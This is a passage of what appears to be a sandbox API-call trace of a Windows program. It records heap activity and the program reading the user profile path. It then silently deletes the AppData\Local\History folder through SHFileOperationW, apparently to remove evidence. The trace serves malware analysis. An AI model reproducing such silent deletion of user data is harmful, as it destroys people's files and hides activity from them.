CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0168.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0168.393] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0168.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0168.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0168.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0168.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0168.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0168.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0168.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0168.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0168.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0168.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0168.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0168.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0168.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0168.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0168.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0168.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0168.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0168.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0168.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0168.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0168.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eb058 [0168.395] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/History", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\History", lpFilePart=0x8cf650*="History") returned 0x25 [0168.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb058 | out: hHeap=0x2af0000) returned 1 [0168.395] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\History" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\history")) returned 0x2416 [0168.395] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\History", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\History", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0168.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0168.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0168.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0168.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0168.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.697] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0168.698] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.698] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0168.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0168.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0168.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0168.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0168.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0168.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0168.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0168.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0168.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0168.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0168.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0168.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0168.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IconCache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0168.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="conCache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0168.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="onCache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0168.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nCache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0168.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0168.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0168.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="che.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0168.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="he.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0168.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0168.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0168.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0168.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0168.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0168.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0168.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0168.699] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0168.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0168.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.699] RtlAllocateHeap 